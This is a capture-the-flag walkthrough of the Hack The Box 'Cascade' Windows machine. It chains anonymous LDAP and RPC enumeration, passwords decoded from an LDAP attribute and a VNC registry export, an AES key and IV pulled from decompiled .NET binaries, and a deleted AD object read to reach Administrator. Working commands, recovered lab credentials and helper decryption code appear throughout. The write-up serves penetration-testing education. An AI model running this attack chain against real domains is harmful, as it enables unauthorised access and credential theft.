Introduction
This is rated a medium-difficulty machine. I encountered a lot of twists and turns: the items found do not give me direct answers, but they are required to reveal the answers, that is user.txt and root.txt. It is a very interesting machine which requires knowledge of manual LDAP enumeration with ldapsearch to gain the initial foothold; then root requires me to decompile one executable and one library to get two clues for root.txt.
nmap enumeration
I did some of the HTB machines and found that I had missed some ports, which made my path to user and root arduous. So I used this command to ensure every port is checked: nmap -A -p- -T4 -oN cascade -vvv -Pn 10.10.10.182
Collect user names
rpcclient -U "" -N 10.10.10.182
This works when an anonymous RPC connection is allowed. Then I ran enumdomusers.
Another way is to use enum4linux -a 10.10.10.182, which collects almost all information about the Windows host.
enum4linux helped me collect a list of domain users, local users and domain groups, together with the members of each domain group.
These are the users:
CascGuest arksvc s.smith r.thompson util j.wakefield s.hickson j.goodhand a.turnbull e.crowe b.hanson d.burman BackupSvc j.allen i.croft
Can I get anonymous SMB access and share information?
smbclient -L 10.10.10.182
From the output, smbclient allows anonymous login but there are no shares listed.
Use nmap script to do LDAP search
nmap -p 389 --script ldap-search 10.10.10.182 -vvv -Pn
This command uses the ldap-search NSE script to get the LDAP information.
The nmap ldap-search script output gives me a list of distinguished names but no information about the common names of each user; it did give me the domain DN, dn: DC=cascade,DC=local, which is the same as cascade.local.
Check for stupid passwords
I got a list of usernames, so there is a chance that a username and its password are the same. So I am using msfconsole to help me run smb_login checks.
In msfconsole use the auxiliary/scanner/smb/smb_login module:
Unfortunately it is not so easy…, no user account uses a stupid password…
Manual LDAP enumeration
I was stuck in getting a foothold, as all the tools had given me not very useful information to break through, until I watched the video by ippsec explaining how he solves the Forest machine. ippsec explained how to use ldapsearch to manually do the LDAP enumeration.
So after some testing I settled on this command:
ldapsearch -x -b "DC=cascade,DC=local" '(objectClass=Person)' -h 10.10.10.182 | tee ldapsearch_users.txt
The output is very long and there is a password within it; I read it three times before I finally found that Ryan Thompson (sAMAccountName: r.thompson) has a special attribute:
cascadeLegacyPwd: clk0bjVldmE=
So I use base64 decode to get the plaintext:
echo "clk0bjVldmE=" | base64 -d
The plaintext password is rY4n5eva. Notice from the nmap enumeration that tcp/5985, which is the WinRM port, is open, so I use evil-winrm to see if I can log in as r.thompson.
evil-winrm -i 10.10.10.182 -u r.thompson -p rY4n5eva
Unfortunately the connection was unsuccessful 😦
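The lesson of the ldapsearch step is that a directory can carry non-standard attributes (here cascadeLegacyPwd) holding encoded secrets that every tool dumps but nobody reads. The scanner below is an added example written for this post, not part of the original walkthrough or any tool it mentions: it parses the flat "attribute: value" text that ldapsearch prints (including LDIF line folding and the double-colon form ldapsearch uses for binary attributes) and flags attributes outside a baseline whose name hints at a credential or whose value is base64 that decodes to readable text. The sample output, the baseline attribute set and the second user's description are constructed; only the r.thompson attribute value is taken from the page.

```python
import base64
import re

# Constructed sample in the flat "attribute: value" form ldapsearch prints; the
# entries and attribute set are trimmed and are not the page's real output.
SAMPLE_LDAPSEARCH = """\
# extended LDIF
#
# LDAPv3
# base <DC=cascade,DC=local> with scope subtree
# filter: (objectClass=Person)

# Ryan Thompson, Users, UK, cascade.local
dn: CN=Ryan Thompson,OU=Users,OU=UK,DC=cascade,DC=local
objectClass: user
sAMAccountName: r.thompson
memberOf: CN=IT,OU=Groups,OU=UK,DC=cascade,DC=local
cascadeLegacyPwd: clk0bjVldmE=

# Steve Smith, Users, UK, cascade.local
dn: CN=Steve Smith,OU=Users,OU=UK,DC=cascade,DC=local
objectClass: user
sAMAccountName: s.smith
description: Long description wrapped by ldapsearch at 76 columns, continu
 ed here
objectGUID:: AAECAwQFBgcICQoLDA0ODw==
"""

# "attr: value" or "attr:: base64value"; the attribute name itself never holds a colon
ATTR_LINE = re.compile(r"^([A-Za-z][\w;.-]*)(::?) ?(.*)$")

# Attributes expected on every user object; anything else is worth a second look.
# (Constructed, shortened baseline; a real audit would use the schema's attribute list.)
BASELINE_ATTRS = {"dn", "objectclass", "samaccountname", "memberof", "description",
                  "objectguid", "cn", "name", "distinguishedname"}
PASSWORD_HINT = re.compile(r"(pw|pwd|pass|secret|cred)", re.I)


def parse_ldif(text):
    """Parse ldapsearch/LDIF text into a list of {attr: [(is_base64, value), ...]}."""
    entries, cur, last = [], {}, None
    for raw in text.splitlines():
        if raw.startswith("#"):
            continue
        if not raw.strip():
            if cur:
                entries.append(cur)
            cur, last = {}, None
            continue
        if raw.startswith(" ") and last is not None:
            # folded line: LDIF wraps long values and marks the continuation with a space
            is_b64, value = cur[last][-1]
            cur[last][-1] = (is_b64, value + raw[1:])
            continue
        m = ATTR_LINE.match(raw)
        if not m:
            continue
        attr, sep, value = m.groups()
        cur.setdefault(attr, []).append((sep == "::", value))
        last = attr
    if cur:
        entries.append(cur)
    return entries


def looks_like_base64_text(value):
    """True if value is valid base64 that decodes to printable ASCII text."""
    if len(value) % 4 or not re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", value):
        return False
    try:
        decoded = base64.b64decode(value, validate=True)
    except ValueError:
        return False
    return bool(decoded) and all(32 <= b < 127 for b in decoded)


def find_legacy_password_attrs(entries):
    """Return (account, attribute, decoded value) for suspicious non-baseline attributes."""
    findings = []
    for entry in entries:
        account = entry.get("sAMAccountName", [(False, "?")])[0][1]
        for attr, values in entry.items():
            if attr.lower() in BASELINE_ATTRS:
                continue
            for is_b64, value in values:
                if is_b64:
                    continue  # LDIF-encoded binary attribute, not an application-stored secret
                if PASSWORD_HINT.search(attr) or looks_like_base64_text(value):
                    decoded = base64.b64decode(value).decode() if looks_like_base64_text(value) else value
                    findings.append((account, attr, decoded))
    return findings


if __name__ == "__main__":
    for account, attr, decoded in find_legacy_password_attrs(parse_ldif(SAMPLE_LDAPSEARCH)):
        print(f"{account}: {attr} decodes to {decoded!r}")
```

Run against a real dump (ldapsearch ... | tee file, then parse_ldif(open(file).read())) the same scan surfaces the cascadeLegacyPwd finding without reading the output three times; the baseline set is the part to tune per domain.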
Connect to SMB shares with r.thompson
I use smbmap -u r.thompson -p rY4n5eva -d cascade.local -H 10.10.10.182
I used smbclient //10.10.10.182/Data -U r.thompson to get into the Data share, and I downloaded everything I could find to be analyzed later.
So here are the locations:
Get the user flag
After I analyzed the files downloaded from the SMB share, the file VNC Install.reg has the password of s.smith. The password is a VNC hex string:
I manually removed all the commas so that it is a hex string like this:
6bcf2a4b6e5aca0f
To decode the hex string to plaintext I use the vncpasswd.py script.
python ../tools/vncpasswd.py/vncpasswd.py -d -H "$(cat s.smith_vnc_pass)"
The output looks like below:
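Removing the commas by hand works once, but a .reg export stores REG_BINARY data as comma-separated hex bytes split across backslash-continued lines, so a small parser is the reliable way to recover the value. The block below is an added example written for this post, not vncpasswd.py or any file from the share: it parses the text form of a .reg export (header, key paths, string, dword and hex values with line continuations) and pulls the VNC Password value out as a plain hex string. The sample file content is constructed; the byte values are the ones shown on the page. The DES unwrapping of that string is left to vncpasswd.py as in the post.

```python
import re

# Constructed sample in .reg export format (not the page's actual VNC Install.reg).
# REG_BINARY values are written as "hex:" with comma-separated bytes and a trailing
# backslash continuing onto the next line, which is why the raw text is not usable as-is.
SAMPLE_REG = """\
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\\SOFTWARE\\TightVNC\\Server]
"ExtraPorts"=""
"QueryTimeout"=dword:0000001e
"Password"=hex:6b,cf,2a,4b,6e,5a,\\
  ca,0f
"""

VALUE_LINE = re.compile(r'^(@|"((?:[^"\\]|\\.)*)")=(.*)$')


def _join_continuations(text):
    """Yield logical lines, joining physical lines that end in a backslash."""
    buf = ""
    for raw in text.splitlines():
        piece = raw.strip() if buf else raw.rstrip()  # continuation lines are indented
        if piece.endswith("\\"):
            buf += piece[:-1]
            continue
        yield buf + piece
        buf = ""


def parse_reg(text):
    """Return {key_path: {value_name: (type_name, value)}} for a .reg export."""
    result, current = {}, None
    for line in _join_continuations(text):
        if not line or line.startswith("Windows Registry Editor") or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            result[current] = {}
            continue
        m = VALUE_LINE.match(line)
        if not m or current is None:
            continue
        name = "@" if m.group(1) == "@" else m.group(2)
        data = m.group(3)
        if data.startswith("hex:"):
            raw_bytes = bytes(int(b, 16) for b in data[4:].split(",") if b)
            result[current][name] = ("REG_BINARY", raw_bytes)
        elif data.startswith("dword:"):
            result[current][name] = ("REG_DWORD", int(data[6:], 16))
        elif data.startswith('"') and data.endswith('"'):
            result[current][name] = ("REG_SZ", data[1:-1])
        else:
            result[current][name] = ("UNKNOWN", data)
    return result


def load_reg_file(path):
    """regedit writes version 5.00 exports as UTF-16LE with a BOM; decode accordingly."""
    with open(path, encoding="utf-16") as fh:
        return parse_reg(fh.read())


def find_vnc_password(reg):
    """Locate a VNC server Password value and return it as a plain hex string."""
    for key, values in reg.items():
        if "vnc" in key.lower() and "Password" in values:
            kind, data = values["Password"]
            if kind == "REG_BINARY":
                return data.hex()
    return None


if __name__ == "__main__":
    print(find_vnc_password(parse_reg(SAMPLE_REG)))
```

The result is the same 16-character hex string the post feeds to vncpasswd.py -d -H; load_reg_file handles the UTF-16 encoding a real export carries, which is what trips up grep on these files.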
I tried the password for s.smith and it worked.
evil-winrm -i 10.10.10.182 -u s.smith -p sT333ve2
I have decided to show the user flag because this flag is dynamic and will be randomized by HTB.
Search for clues towards root
The items downloaded from the SMB shares are useful now; here are the exhibits pointing towards the path to root.
Meeting_Notes_June_2018.html reveals that the TempAdmin password is the same as the Administrator password, so by getting the TempAdmin password I can get the Administrator password.
ArkAdRecycleBin.log reveals that the ARK AD RECYCLE BIN MANAGER, executed by arksvc, moved the TempAdmin account to the AD Recycle Bin.
Using the account of r.thompson I searched high and low for a binary, but those I found were rabbit holes; finally I remembered something… maybe the binaries are in the SMB shares…
Find the binaries and database
To find the binaries I used the s.smith credential to find out which shares this account can access, and I found that s.smith can access Audit$ while r.thompson cannot.
smbmap -u s.smith -p sT333ve2 -d cascade.local -H 10.10.10.182
To log in to the Audit$ share I use smbclient //10.10.10.182/Audit$ -U s.smith.
Ah… So I have found the binaries…
The rest of the files I found, except for CascAudit.exe, CascCrypto.dll and Audit.db, are rabbit holes.
Audit.db is a SQLite database, so I dug further by connecting to this database.
Read this article to learn how to connect to a SQLite db with the sqlite3 client in Linux. As I do not know the structure of the database I am using strings Audit.db to help me read the human-readable text within the database.
So ldap is the table I need to get some usernames and passwords.
I connect to Audit.db with sqlite3 Audit.db.
There is only one entry, which should be the password of arksvc, but it is not a plaintext password; at first I thought it was base64-encoded text, but unfortunately it was not so easy.
Find the initialization vector and key from CascAudit.exe and CascCrypto.dll
Two members of the forum recommended dnSpy, which is a .NET decompiler, to find the IV and key.
I quickly downloaded and imported a Win10 machine, which is free for developers for 90 days for development work and testing, then I downloaded dnSpy and installed the dependencies.
First I loaded CascCrypto.dll and found the IV.
The IV is 1tdyjCbY1Ix49842.
Next I opened CascAudit.exe to find the key.
The key is c4scadek3y654321.
The last thing I need is a ciphertext of Administrator to reveal the password.
Get ArkSvc password
I got arksvc's ciphertext password from Audit.db using the sqlite3 client; this is the ciphertext BQO5l5Kj9MdErXx6Q6AGOw==. From dnSpy it is revealed that the binaries use 128-bit AES-CBC encryption.
With the ciphertext, IV and key I can decrypt with AES-CBC 128-bit; I am using this online decrypter to help me recover the plaintext password of arksvc.
The arksvc password is w3lc0meFr31nd.
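Pasting a recovered credential into an online decrypter is a habit worth dropping; the point of this step is that a key and IV compiled into a distributed binary give the stored password no protection at all, and the decryption can be done offline. The block below is an added example written for this post, not code from CascAudit.exe, CascCrypto.dll or the online tool: a dependency-free AES-128-CBC decrypter in Python (the S-box is derived from the field inverse rather than typed in as a table), with PKCS#7 unpadding that rejects a wrong key or IV and a self-test against the FIPS-197 test vector. The key, IV and ciphertext are the values the page recovered; the assumption that the binary uses PKCS#7 padding is the .NET AES default and is not stated on the page.

```python
import base64

# Values recovered on the page; this decrypter itself is an added example, not the tool's code.
KEY = b"c4scadek3y654321"                 # from CascAudit.exe
IV = b"1tdyjCbY1Ix49842"                  # from CascCrypto.dll
CIPHERTEXT_B64 = "BQO5l5Kj9MdErXx6Q6AGOw=="  # arksvc row in Audit.db


def gf_mul(a, b):
    """Multiply two bytes in GF(2^8) modulo the AES polynomial x^8+x^4+x^3+x+1."""
    p = 0
    for _ in range(8):
        if b & 1:
            p ^= a
        carry = a & 0x80
        a = (a << 1) & 0xFF
        if carry:
            a ^= 0x1B
        b >>= 1
    return p


def _build_sboxes():
    """Derive S-box and inverse S-box: field inverse followed by the affine map."""
    sbox = [0] * 256
    for x in range(256):
        inv = 1 if x else 0
        for _ in range(254 if x else 0):   # x^254 == x^-1 in GF(2^8); inverse of 0 is 0
            inv = gf_mul(inv, x)
        s = inv
        for i in range(1, 5):
            s ^= ((inv << i) | (inv >> (8 - i))) & 0xFF
        sbox[x] = s ^ 0x63
    inv_sbox = [0] * 256
    for i, v in enumerate(sbox):
        inv_sbox[v] = i
    return sbox, inv_sbox


SBOX, INV_SBOX = _build_sboxes()
RCON = [0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x1B, 0x36]


def expand_key(key):
    """AES-128 key schedule: 11 round keys of 16 bytes each."""
    w = [list(key[i:i + 4]) for i in range(0, 16, 4)]
    for i in range(4, 44):
        t = list(w[i - 1])
        if i % 4 == 0:
            t = [SBOX[b] for b in t[1:] + t[:1]]   # RotWord then SubWord
            t[0] ^= RCON[i // 4 - 1]
        w.append([w[i - 4][j] ^ t[j] for j in range(4)])
    return [sum(w[4 * r:4 * r + 4], []) for r in range(11)]


def _inv_shift_rows(s):
    # state is column-major: byte index = row + 4*col; row r rotates right by r
    return [s[r + 4 * ((c - r) % 4)] for c in range(4) for r in range(4)]


def _inv_mix_columns(s):
    out = []
    for c in range(4):
        a0, a1, a2, a3 = s[4 * c:4 * c + 4]
        out += [gf_mul(a0, 14) ^ gf_mul(a1, 11) ^ gf_mul(a2, 13) ^ gf_mul(a3, 9),
                gf_mul(a0, 9) ^ gf_mul(a1, 14) ^ gf_mul(a2, 11) ^ gf_mul(a3, 13),
                gf_mul(a0, 13) ^ gf_mul(a1, 9) ^ gf_mul(a2, 14) ^ gf_mul(a3, 11),
                gf_mul(a0, 11) ^ gf_mul(a1, 13) ^ gf_mul(a2, 9) ^ gf_mul(a3, 14)]
    return out


def decrypt_block(block, round_keys):
    """Inverse cipher for one 16-byte block (FIPS-197 section 5.3)."""
    s = [b ^ k for b, k in zip(block, round_keys[10])]
    for rnd in range(9, 0, -1):
        s = [INV_SBOX[b] for b in _inv_shift_rows(s)]
        s = _inv_mix_columns([b ^ k for b, k in zip(s, round_keys[rnd])])
    s = [INV_SBOX[b] for b in _inv_shift_rows(s)]
    return bytes(b ^ k for b, k in zip(s, round_keys[0]))


def aes128_cbc_decrypt(ciphertext, key, iv):
    """CBC decryption with PKCS#7 unpadding; a wrong key or IV shows up as bad padding."""
    if len(ciphertext) % 16 or len(key) != 16 or len(iv) != 16:
        raise ValueError("ciphertext must be a multiple of 16 bytes; key and IV 16 bytes")
    rk = expand_key(key)
    prev, out = iv, b""
    for i in range(0, len(ciphertext), 16):
        blk = ciphertext[i:i + 16]
        out += bytes(p ^ q for p, q in zip(decrypt_block(blk, rk), prev))
        prev = blk
    pad = out[-1]
    if not 1 <= pad <= 16 or out[-pad:] != bytes([pad]) * pad:
        raise ValueError("bad PKCS#7 padding: wrong key or IV")
    return out[:-pad]


def fips197_self_test():
    """Check the implementation against the FIPS-197 Appendix C.1 AES-128 vector."""
    ct = bytes.fromhex("69c4e0d86a7b0430d8cdb78070b4c55a")
    return decrypt_block(ct, expand_key(bytes(range(16)))) == bytes.fromhex("00112233445566778899aabbccddeeff")


def recover_arksvc_password():
    return aes128_cbc_decrypt(base64.b64decode(CIPHERTEXT_B64), KEY, IV).decode()


if __name__ == "__main__":
    assert fips197_self_test()
    print(recover_arksvc_password())
```

The padding check is the practical part: with a single byte of the IV wrong the last plaintext block is off by one byte and the unpadding fails loudly instead of returning garbage, so a decryption that succeeds is evidence the key and IV pulled from the binaries are the right ones.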
Get the root
evil-winrm -i 10.10.10.182 -u arksvc -p w3lc0meFr31nd
arksvc is a member of the AD Recycle Bin group, which s.smith is not; in order to read a deleted AD object, membership of AD Recycle Bin is necessary. arksvc cannot restore the AD object, but it can read the deleted object within the AD Recycle Bin.
I need to read the TempAdmin object to see if the password is inside. I searched the web and found this forum, which explained how to read a deleted AD object.
In evil-winrm this is the command I use to read the deleted TempAdmin: Get-ADObject -SearchBase "CN=Deleted Objects,DC=cascade,DC=local" -Filter {ObjectClass -eq "user"} -Properties * -IncludeDeletedObjects
Reading the result line by line I found there is a password:
The base64-encoded password is YmFDVDNyMWFOMDBkbGVz.
echo "YmFDVDNyMWFOMDBkbGVz" | base64 -d
reveals the TempAdmin plaintext password, which is the same as the Administrator password, as learned from the email downloaded from the SMB share.
The password is baCT3r1aN00dles.
I log in with evil-winrm as Administrator: evil-winrm -i 10.10.10.182 -u Administrator -p baCT3r1aN00dles